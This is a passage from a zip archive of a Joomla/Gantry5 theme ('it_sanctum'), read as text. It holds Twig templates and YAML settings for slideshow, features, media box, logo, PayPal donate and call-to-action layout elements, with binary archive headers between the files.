                    {{- gantry.platform.filter(item.description)|html|raw -}}
                </div>
            {% endset %}

            {% set buttons %}
                <div class="g-slideshow-buttons">
                    {% for button in item.buttons %}
                        <a class="button {{ button.buttonstyle|default('empty-light')|e }}" target="{{ button.target|default('_parent')|e }}" href="{{ button.link|e }}">
                            {%- if button.buttonicon -%}
                                <span class="{{ button.buttonicon|e }}"></span>
                            {%- endif -%}
                            {{- button.text|raw -}}
                        </a>
                    {% endfor %}    
                </div>
            {% endset %}

            {% if item.overlaystyle|default('style1') == 'style1' %}

                {% if (item.overlayposition|default('bottom') == 'bottom') or (item.overlayposition|default('bottom') == 'top') or (item.overlayposition|default('bottom') == 'left') or (item.overlayposition|default('bottom') == 'right') %}
                    <div class="uk-overlay-panel uk-overlay-background {{ overlay_position }} {{ slide_overlay_animation }} {% if item.overlaywidth|default(auto)|e != 'auto' %} uk-width-1-{{ item.overlaywidth|default(auto)|e }}{% endif %} {{ item.overlaystyle|default("style1")|e }}">
                        <div class="slideshow-caption">
                            {% if item.title %}
                                {{ title }}
                            {% endif %}

                            {% if item.description %}
                                {{ description }}
                            {% endif %}

                            {% if item.buttons %}
                                {{ buttons }}
                            {% endif %}
                        </div>
                    </div>
                {% else %}
                    <div class="uk-overlay-panel uk-flex {{ overlay_position }} {{ slide_overlay_animation }}{% if item.overlaycontainer|default(0) == 1 %} g-overlay-container{% endif %} {{ item.overlaystyle|default("style1")|e }}">
                        <div class="slideshow-caption uk-overlay-background{% if item.overlaywidth|default(auto)|e != 'auto' %} uk-width-1-{{ item.overlaywidth|default(auto)|e }}{% endif %}">
                            {% if item.title %}
                                {{ title }}
                            {% endif %}

                            {% if item.description %}
                                {{ description }}
                            {% endif %}

                            {% if item.buttons %}
                                {{ buttons }}
                            {% endif %}
                        </div>
                    </div>
                {% endif %}

            {% endif %}

            {% if item.overlaystyle|default('style1') == 'style2' or item.overlaystyle|default('style1') == 'style3' %}
                
                {% if (item.overlayposition|default('bottom') == 'bottom') or (item.overlayposition|default('bottom') == 'top') or (item.overlayposition|default('bottom') == 'left') or (item.overlayposition|default('bottom') == 'right') %}
                     <div class="uk-overlay-panel {{ overlay_position }} {{ slide_overlay_animation }} {% if item.overlaywidth|default(auto)|e != 'auto' %} uk-width-1-{{ item.overlaywidth|default(auto)|e }}{% endif %} {{ item.overlaystyle|default("style1")|e }}">
                        <div class="slideshow-caption">
                            {% if item.title %}
                                {{ title }}
                            {% endif %}

                            {% if item.description %}
                                {{ description }}
                            {% endif %}

                            {% if item.buttons %}
                                {{ buttons }}
                            {% endif %}
                        </div>
                    </div>
                {% else %}
                    <div class="uk-overlay-panel uk-flex {{ overlay_position }} {{ slide_overlay_animation }}{% if item.overlaycontainer|default(0) == 1 %} g-overlay-container{% endif %} {{ item.overlaystyle|default("style1")|e }}">
                        <div class="slideshow-caption{% if item.overlaywidth|default(auto)|e != 'auto' %} uk-width-1-{{ item.overlaywidth|default(auto)|e }}{% endif %}">
                            {% if item.title %}
                                {{ title }}
                            {% endif %}

                            {% if item.description %}
                                {{ description }}
                            {% endif %}

                            {% if item.buttons %}
                                {{ buttons }}
                            {% endif %}
                        </div>
                    </div>
                {% endif %}

            {% endif %}

        {% endset %}

        <li class="g-slideshow-item{% if item.class %} {{ item.class|e }}{% endif %}">
            {{ slide_media }}
            {% if item.title or item.description or item.buttons %}
                {{ slide_overlay }}
            {% endif %}
        </li>
    {% endfor %}
{% endset %}

{% block particle %}
    
    <div class="g-slideshow{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        {% if particle.mainheading or particle.introtext %}
            {{ particleheading }}
        {% endif %}
        <div class="uk-slidenav-position{% if particle.fullscreen|default(0) %} fullscreen{% endif %}{% if particle.navigation|default('arrows') == 'arrowsvisible' or particle.navigation|default('arrows') == 'bothvisible' %} nav-visible{% endif %}" data-uk-slideshow="{{ slideshow_settings }}">
            <ul class="uk-slideshow uk-overlay-active{% if particle.fullscreen|default(0) %} uk-slideshow-fullscreen{% endif %}">
                {{ slideshow_slides }}
            </ul>

            {% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'arrowsvisible') or (particle.navigation|default('arrows') == 'both') or (particle.navigation|default('arrows') == 'bothvisible') %}
                <a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slideshow-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
                <a href="" class="uk-slidenav uk-slidenav-next" data-uk-slideshow-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
            {% endif %}

            {% if (particle.navigation|default('arrows') == 'dots') or (particle.navigation|default('arrows') == 'both') or (particle.navigation|default('arrows') == 'bothvisible') %}
                <ul class="uk-dotnav uk-dotnav-contrast uk-position-bottom uk-flex-center">
                {% set counter = 0 %}
                {% for item in particle.items %}
                    <li data-uk-slideshow-item="{{ counter }}"><a href="" aria-label="{{'Item'|trans_key('IT_ACCESS_ITEM')}} {{ counter }}"></a></li>
                    {% set counter = counter + 1 %}
                {% endfor %}
                </ul>
            {% endif %}
        </div>
    </div>
{% endblock %}PK!p�����%it_sanctum/particles/content-pro.yamlnu&1i�name: Content PRO
description: Display content in an awesome way.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Content PRO particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2
        style3: Style 3

    behaviour:
      type: select.select
      label: Behaviour
      description: Select the particle behaviour - static, slider or slideset.
      placeholder: 'Select...'
      default: static
      options:
        static: Static
        slider: Slider
        slideset: Slideset

    columns:
      type: select.select
      label: Items per Slide
      description: Select the number of items per slide for the Slider and Slideset behaviour. This option also acts as 'Items per Row' for the 'Static' behavior.
      placeholder: 'Select...'
      default: 3
      options:
        1: 1
        2: 2
        3: 3
        4: 4
        5: 5
        6: 6
        10: 10

    gutter:
      type: select.select
      label: Gutter
      description: Enable or disable the Content PRO gutter (to have space between the items or not).
      placeholder: 'Select...'
      default: enabled
      options:
        enabled: Enabled
        disabled: Disabled

    autoplay:
      type: select.select
      label: Autoplay
      description: Select whether or not the Slider and Slideset items should switch automatically
      placeholder: 'Select...'
      default: disable
      options:
        enable: Enabled
        disable: Disabled

    autoplayInterval:
      type: input.text
      label: Autoplay Interval
      description: Set the timespan in miliseconds between switching the Slider and Slideset items.
      default: 7000

    navigation:
      type: select.select
      label: Navigation
      description: Select the navigation type (Slideset ONLY).
      placeholder: 'Select...'
      default: arrows
      options:
        arrows: Arrows
        dots: Dots
        both: Both

    animation:
      type: select.select
      label: Animation
      description: Select the animation type (Slideset ONLY).
      placeholder: 'Select...'
      default: fade
      options:
        fade: Fade
        scale: Scale
        slide-horizontal: Slide-horizontal
        slide-vertical: Slide-vertical
        slide-top: Slide-top
        slide-bottom: Slide-bottom

    duration:
      type: input.text
      label: Animation Duration
      description: Set the animation duration in miliseconds (Slideset ONLY).
      default: 200

    lightbox:
      type: select.select
      label: Lightbox
      description: Enable or disable the image lightbox/popup.
      placeholder: 'Select...'
      default: enable
      options:
        enable: Enabled
        disable: Disabled
        disablelink: Disabled (Item Link)

    pullup:
      type: input.checkbox
      label: Pull Up
      description: If enabled, a negative 'margin-top' will be applied to the particle. Enabling this option is recommended only when the particle is just below the slider.
      default: 0

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default:

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Content PRO Items
      description: Create each Content PRO item to display.
      value: name
      ajax: true

      fields:

        .image:
          type: input.imagepicker
          label: Image

        .alt:
          type: input.text
          label: Image Alt Tag

        .title:
          type: input.text
          label: Title

        .link:
          type: input.text
          label: Title Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .description:
          type: textarea.textarea
          label: Description

        .date:
          type: input.text
          label: Date
          description: Enter the date that you want to be associated with this item. The field is mostly used as a 'Published Date'. Being able to type in the date manually gives you a great flexibility as you can show the exact format you want.

        .specialtext:
          type: input.text
          label: Special Text

        .icon:
          type: input.icon
          label: Special Icon
          description: Choose an icon to be placed in front of 'Special Text'.

        .bottomlink:
          type: input.text
          label: Bottom Link
          description: Enter the clickable text you want to be shown. The link is the URL you enter in the 'Title Link' field above.

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!M�w��it_sanctum/particles/uikit.yamlnu&1i�name: UIkit for Gantry5
description: Configure UIkit for Gantry5.
type: atom

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable UIkit for Gantry5 particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: 'This Atom loads a modified and optimized version of the <a href="http://getuikit.com/index.html" target="_blank">UIkit Framework</a> prepared specifically for Gantry 5.<br />Developed and maintained by <a href="http://www.inspiretheme.com/" target="_blank">InspireTheme.com</a><br /><br /><strong>UIkit Version:</strong><br />2.27.4<br /><br /><strong>Components Included:</strong><br />Core, Dynamic Grid, Dotnav, Progress, Slidenav, Lightbox, Slider, Slideset, Slideshow, Parallax, Accordion, Notify, Sticky, Tooltip'

    jslocation:
      type: select.select
      label: JS Location
      description: Select where the UIkit JS assets should be loaded. The default and recommended location is 'Footer' (before the closing body tag).
      placeholder: 'Select...'
      default: footer
      options:
        footer: Footer
        head: HeadPK!���::,it_sanctum/particles/paypal-donate.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% block particle %}
	<div class="g-paypaldonate{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
		{% if particle.mainheading or particle.introtext %}
			{{ particleheading }}
		{% endif %}

		<div class="g-paypaldonate-form">
			<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="{{ particle.target|default('_blank')|e }}">
				<input type="hidden" name="business" value="{{ particle.email|e }}" />
				<input type="hidden" name="cmd" value="_donations">
			
				<input type="hidden" name="item_name" value="{{ particle.itemname|e }}">
				<input type="hidden" name="item_number" value="{{ particle.itemnumber|e }}">
				<input type="hidden" name="currency_code" value="{{ particle.currencycode|e }}">
			
				<div class="g-paypaldonate-button button">
					{% if particle.buttonicon %}
						<i class="g-paypaldonate-icon {{ particle.buttonicon|e }}"></i>
					{% endif %}
					<input type="submit" alt="Donate" name="submit" value="{{ particle.buttontext|e }}">
				</div>
			</form>
		</div>
	</div>
{% endblock %}PK!r��G**(it_sanctum/particles/media-box.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% block particle %}
	<div class="g-media-box{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
		{% if particle.mainheading or particle.introtext %}
			{{ particleheading }}
		{% endif %}
		{% for row in particle.items|batch(particle.columns|default('1')|e) %}
			<div class="g-grid">
				{% for item in row %}
					{% set attr_extra_item = '' %}
					{% for extra in item.extra %}
						{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
					{% endfor %}

					{% set toggleid = random() %}
						
					<div class="g-block{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						<div classs="g-content">
							<div class="g-media-box-item">
								{% if item.image %}
									<img class="g-media-box-image" alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
								{% endif %}

								<div class="g-media-box-content">
									{% if item.title %}
										<h4 class="g-media-box-title">
											{%- if item.titlelink -%}
												<a target="{{ item.titletarget|default('_parent')|e }}" href="{{ item.titlelink|e }}">
											{%- endif -%}
												{{- item.title|raw -}}
											{%- if item.titlelink -%}
												</a>
											{%- endif -%}
										</h4>
									{% endif %}

									<div class="g-grid g-media-box-links">
										<div class="g-block">
											{% if item.audio %}
												<div class="g-media-box-play uk-hidden" id="toggle-{{ toggleid }}">
													<audio controls>
														<source src="{{ url(item.audio) }}" type="audio/{{ item.format|default('mpeg')|e }}">
													</audio>
												</div>
												<a class="button-media" data-uk-toggle="{target:'#toggle-{{ toggleid }}', animation:'uk-animation-slide-bottom'}" {% if item.tooltip1 %}data-uk-tooltip="{pos:'{{ particle.tooltippos|default('top') }}'}" title="{{ item.tooltip1|e }}" aria-label="{{ item.tooltip1|e }}"{% endif %}>
													{% if item.buttonicon1 %}
														<i class="{{ item.buttonicon1|e }}"></i>
														{%- if item.tooltip1 -%}
															<span class="g-item-text">{{ item.tooltip1|e }}</span>
														{%- endif -%}
													{% endif %}
												</a>
											{% endif %}

											{% if item.video %}
												<a href="{{ item.video|e }}" class="button-media" data-uk-lightbox {% if item.tooltip2 %}data-uk-tooltip="{pos:'{{ particle.tooltippos|default('top') }}'}" title="{{ item.tooltip2|e }}" aria-label="{{ item.tooltip2|e }}"{% endif %}>
													{% if item.buttonicon2 %}
														<i class="{{ item.buttonicon2|e }}"></i>
														{%- if item.tooltip2 -%}
															<span class="g-item-text">{{ item.tooltip2|e }}</span>
														{%- endif -%}
													{% endif %}
												</a>
											{% endif %}

											{% if item.readfile %}
												<a class="button-media" target="{{ item.target3|default('_parent')|e }}" href="{{ item.readfile|e }}" {% if item.tooltip3 %}data-uk-tooltip="{pos:'{{ particle.tooltippos|default('top') }}'}" title="{{ item.tooltip3|e }} aria-label="{{ item.tooltip3|e }}""{% endif %}>
													{% if item.buttonicon3 %}
														<i class="{{ item.buttonicon3|e }}"></i>
														{%- if item.tooltip3 -%}
															<span class="g-item-text">{{ item.tooltip3|e }}</span>
														{%- endif -%}
													{% endif %}
												</a>
											{% endif %}

											{% if item.readfile2 %}
												<a class="button-media" target="{{ item.target4|default('_parent')|e }}" href="{{ item.readfile2|e }}" {% if item.tooltip4 %}data-uk-tooltip="{pos:'{{ particle.tooltippos|default('top') }}'}" title="{{ item.tooltip4|e }}" aria-label="{{ item.tooltip4|e }}"{% endif %} download>
													{% if item.buttonicon4 %}
														<i class="{{ item.buttonicon4|e }}"></i>
														{%- if item.tooltip4 -%}
															<span class="g-item-text">{{ item.tooltip4|e }}</span>
														{%- endif -%}
													{% endif %}
												</a>
											{% endif %}

											{% if item.readmore %}
												<a class="button-media" target="{{ item.target5|default('_parent')|e }}" href="{{ item.readmore|e }}" {% if item.tooltip5 %}data-uk-tooltip="{pos:'{{ particle.tooltippos|default('top') }}'}" title="{{ item.tooltip5|e }}" aria-label="{{ item.tooltip5|e }}"{% endif %}>
													{% if item.buttonicon5 %}
														<i class="{{ item.buttonicon5|e }}"></i>
														{%- if item.tooltip5 -%}
															<span class="g-item-text">{{ item.tooltip5|e }}</span>
														{%- endif -%}
													{% endif %}
												</a>
											{% endif %}
										</div>
									</div>

									{% if item.description %}
										<div class="g-media-box-desc">
											{{- item.description|raw -}}
										</div>
									{% endif %}

									{% if item.special1 %}
										<div class="g-media-box-special1">
											{{- item.special1|raw -}}
										</div>
									{% endif %}

									{% if item.special2 %}
										<div class="g-media-box-special2">
											{{- item.special2|raw -}}
											{%- if item.special2text -%}
												<a target="{{ item.target|default('_parent')|e }}" href="{{ item.special2link|e }}">
											{%- endif -%}
												{{- item.special2text|raw -}}
											{%- if item.special2text -%}
												</a>
											{%- endif -%}
										</div>
									{% endif %}
								</div>
							</div>
						</div>
					</div>
				{% endfor %}
			</div>
		{% endfor %}
    </div>
{% endblock %}PK!�u�55#it_sanctum/particles/logo.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block particle %}
    {% set url = url(particle.url)|default(gantry.siteUrl()) %}
    {% if (url == gantry.siteUrl()) %}{% set rel='rel="home"' %}{% endif %}

<a href="{{ url }}" title="{{ particle.text }}" {{ rel|default('')|raw }} class="g-logo {{ particle.class|default('')|raw }}">
    {% set image = url(particle.image) %}
    {% if image %}
    <img src="{{ url(particle.image) }}" alt="{{ particle.text }}" />
    {% else %}
    {{ particle.text|default('Logo') }}
    {% endif %}
</a>
{% endblock %}
PK!���it_sanctum/particles/logo.yamlnu&1i�name: Logo / Image
description: Display a logo or an image.
type: particle
icon: fa-file-image-o

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable logo particles.
      default: true

    url:
      type: input.text
      label: Url
      description: Url for the image. Leave empty to go to home page.

    image:
      type: input.imagepicker
      label: Image
      description: Select desired logo image.

    text:
      type: input.text
      label: Text
      description: Input logo description text.

    class:
      type: input.selectize
      label: CSS Classes
      description: Set a specific CSS class for custom styling.
PK!��N��'it_sanctum/particles/features.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
	{% for attributes in particle.extra %}
		{% for key, value in attributes %}
			{% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
		{% endfor %}
	{% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% set mainclass %}
	{% if particle.style|default("style1") == "style1" or particle.style|default('style1') == 'style6' or particle.style|default('style1') == 'style7' or particle.style|default('style1') == 'style8' %}
		g-features-particle
	{% else %}
		g-features2-particle
	{% endif %}
{% endset %}

{% set featuresitems %}
	{% for row in particle.items|batch(particle.columns|default('3')|e) %}
		<div class="g-grid">
			{% for item in row %}
				{% set attr_extra_item = '' %}
				{% for extra in item.extra %}
					{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
				{% endfor %}

				{% set subfeatures %}
					<div class="g-features-particle-subs">
						{% if item.subfeature1 %}<div class="g-subs-item">{{ item.subfeature1|raw }}</div>{% endif %}
						{% if item.subfeature2 %}<div class="g-subs-item">{{ item.subfeature2|raw }}</div>{% endif %}
						{% if item.subfeature3 %}<div class="g-subs-item">{{ item.subfeature3|raw }}</div>{% endif %}
						{% if item.subfeature4 %}<div class="g-subs-item">{{ item.subfeature4|raw }}</div>{% endif %}
						{% if item.subfeature5 %}<div class="g-subs-item">{{ item.subfeature5|raw }}</div>{% endif %}
					</div>
				{% endset %}

				{% set button %}
					<div class="g-features-particle-button">
						<a class="button" target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
							{{- item.buttontext|raw -}}
						</a>
					</div>
				{% endset %}

				{% set style1 %}
					<div class="g-block g-features-particle-item{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						{% if particle.style|default("style1") != "style8" %}
						<div class="g-content">
						{% endif %}

							{% if particle.style|default("style1") == "style7" %}
							<div class="g-features-particle-item-inner">
							{% endif %}

							{% if item.icon and item.image == false %}
								<span class="g-features-particle-icon {{ item.icon|e }}">
									<span class="g-circle-border"></span>
								</span>
							{% endif %}

							{% if item.image %}
								<div class="g-features-particle-image">
									<img alt="{{ item.title|e }}" src="{{ url(item.image) }}" {{ particle.image|imagesize|raw }}>
								</div>
							{% endif %}

							{% if item.title %}
								<h4 class="g-features-particle-title">
									{%- if item.link -%}
										<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
									{%- endif -%}
										{{- item.title|raw -}}
									{%- if item.link -%}
										</a>
									{%- endif -%}
								</h4>
							{% endif %}

							{% if item.description %}
								<p class="g-features-particle-desc">
									{{- item.description|raw -}}
								</p>
							{% endif %}

							{% if item.subfeature1 or item.subfeature2 or item.subfeature3 or item.subfeature4 or item.subfeature5 %}
								{{ subfeatures }}
							{% endif %}

							{% if item.buttontext %}
								{{ button }}
							{% endif %}

							{% if particle.style|default("style1") == "style7" %}
							</div>
							{% endif %}

						{% if particle.style|default("style1") != "style8" %}
						</div>
						{% endif %}
					</div>
				{% endset %}

				{% set style2 %}
					<div class="g-block g-features2-particle-item{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						<div class="g-content">
							{% if item.title %}
								<h4 class="g-features2-particle-title">
									{%- if item.link -%}
										<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
									{%- endif -%}
									{%- if item.icon and item.image == false -%}
										<span class="g-features2-particle-icon {{ item.icon|e }}"></span>
									{%- endif -%}
									{%- if item.image -%}
										<div class="g-features2-particle-image">
											<img alt="{{ item.title|e }}" src="{{ url(item.image) }}" {{ particle.image|imagesize|raw }}>
										</div>
									{%- endif -%}
										{{- item.title|raw -}}
									{%- if item.link -%}
										</a>
									{%- endif -%}
								</h4>
							{% endif %}

							{% if item.description %}
								<p class="g-features2-particle-desc">
									{{- item.description|raw -}}
								</p>
							{% endif %}

							{% if item.subfeature1 or item.subfeature2 or item.subfeature3 or item.subfeature4 or item.subfeature5 %}
								{{ subfeatures }}
							{% endif %}

							{% if item.buttontext %}
								{{ button }}
							{% endif %}
						</div>
					</div>
				{% endset %}

				{% set style3 %}
					<div class="g-block g-features2-particle-item{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						<div class="g-content">
							{% if item.icon and item.image == false %}
								<div class="g-features2-particle-icon">
									<span class="{{ item.icon|e }}"></span>
								</div>
							{% endif %}

							{% if item.image %}
								<div class="g-features2-particle-image">
									<img alt="{{ item.title|e }}" src="{{ url(item.image) }}" {{ particle.image|imagesize|raw }}>
								</div>
							{% endif %}

							{% if item.title or item.description or item.buttontext or item.subfeature1 or item.subfeature2 or item.subfeature3 or item.subfeature4 or item.subfeature5%}
								<div class="g-title-desc-container">
									{% if item.title %}
										<h4 class="g-features2-particle-title">
											{%- if item.link -%}
												<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
											{%- endif -%}
												{{- item.title|raw -}}
											{%- if item.link -%}
												</a>
											{%- endif -%}
										</h4>
									{% endif %}

									{% if item.description %}
										<p class="g-features2-particle-desc">
											{{- item.description|raw -}}
										</p>
									{% endif %}

									{% if item.subfeature1 or item.subfeature2 or item.subfeature3 or item.subfeature4 or item.subfeature5 %}
										{{ subfeatures }}
									{% endif %}

									{% if item.buttontext %}
										{{ button }}
									{% endif %}
								</div>
							{% endif %}
						</div>
					</div>
				{% endset %}

				{% if particle.style|default("style1") == "style1" or particle.style|default('style1') == 'style6' or particle.style|default('style1') == 'style7' or particle.style|default('style1') == 'style8' %}{{ style1 }}{% endif %}
				{% if particle.style|default("style1") == "style2" or particle.style|default('style1') == 'style3' %}{{ style2 }}{% endif %}
				{% if particle.style|default("style1") == "style4" or particle.style|default('style1') == 'style5' %}{{ style3 }}{% endif %}

			{% endfor %}
		</div>
	{% endfor %}

{% endset %}

{% block particle %}
	<div class="{{ mainclass|trim }} {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
		{% if particle.mainheading or particle.introtext %}
			{{ particleheading }}
		{% endif %}
		{{ featuresitems }}
	</div>
{% endblock %}PK!�^_'77*it_sanctum/particles/template-js.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block javascript_footer %}
    {% if particle.enabled %}
        {{ joomla.html('jquery.framework') }}
        {{ parent() }}
        <script src="{{ url('gantry-theme://js/template.js') }}" type="text/javascript"></script>
    {% endif %}
{% endblock %}PK!
�C��)it_sanctum/particles/cta-button.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set ctabutton %}
    <div class="g-grid">
        <div class="g-block">
            <div class="g-cta-inner clearfix">
                <div class="g-cta-left {% if particle.description == false %} no-desc{% endif %}">
                    {% if particle.title %}<h3 class="g-cta-title">{{ particle.title|raw }}</h3>{% endif %}
                    {% if particle.description %}<span class="g-cta-desc">{{ particle.description|raw }}</span>{% endif %}
                </div>
                <div class="g-cta-right{% if particle.description == false %} no-desc{% endif %}">
                    {% if particle.link %}
                        <a class="button" target="{{ particle.target|default('_parent')|e }}" href="{{ particle.link|e }}">{% if particle.buttonicon %}<i class="{{ particle.buttonicon|e }}"></i>{% endif %}{{ particle.buttontext|e }}</a>
                    {% endif %}
                </div>
            </div>
        </div>
    </div>
{% endset %}

{% block particle %}

    <div class="g-cta-button{% if particle.css.class %} {{ particle.css.class|e }}{% endif %} {{ particle.style|default("style1")|e }}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        {% if particle.style|default("style1") == "style1" %}{{ ctabutton }}{% endif %}
        {% if particle.style|default("style1") == "style2" %}{{ ctabutton }}{% endif %}
    </div>

{% endblock %}PK!<w��
�
"it_sanctum/particles/features.yamlnu&1i�name: Features
description: Display features.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Features particles.
      default: true

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2
        style3: Style 3
        style4: Style 4
        style5: Style 5
        style6: Style 6
        style7: Style 7
        style8: Style 8

    columns:
      type: select.select
      label: Items per Row
      description: Select the number of items per row.
      placeholder: 'Select...'
      default: 3
      options:
        1: 1
        2: 2
        3: 3
        4: 4
        5: 5
        6: 6

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Features Items
      description: Create each feature item to display.
      value: name
      ajax: true

      fields:

        .icon:
          type: input.icon
          label: Icon

        .image:
          type: input.imagepicker
          label: Image

        .title:
          type: input.text
          label: Title

        .link:
          type: input.text
          label: Title Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .description:
          type: textarea.textarea
          label: Description

        .subfeature1:
          type: input.text
          label: Subfeature 1

        .subfeature2:
          type: input.text
          label: Subfeature 2

        .subfeature3:
          type: input.text
          label: Subfeature 3

        .subfeature4:
          type: input.text
          label: Subfeature 4

        .subfeature5:
          type: input.text
          label: Subfeature 5

        .buttontext:
          type: input.text
          label: Button Text
          description: Enter the button text you want to be shown. The link is the URL you enter in the 'Title Link' field above.

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!0�Z�F�F1it_sanctum/particles/content-pro-joomla.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

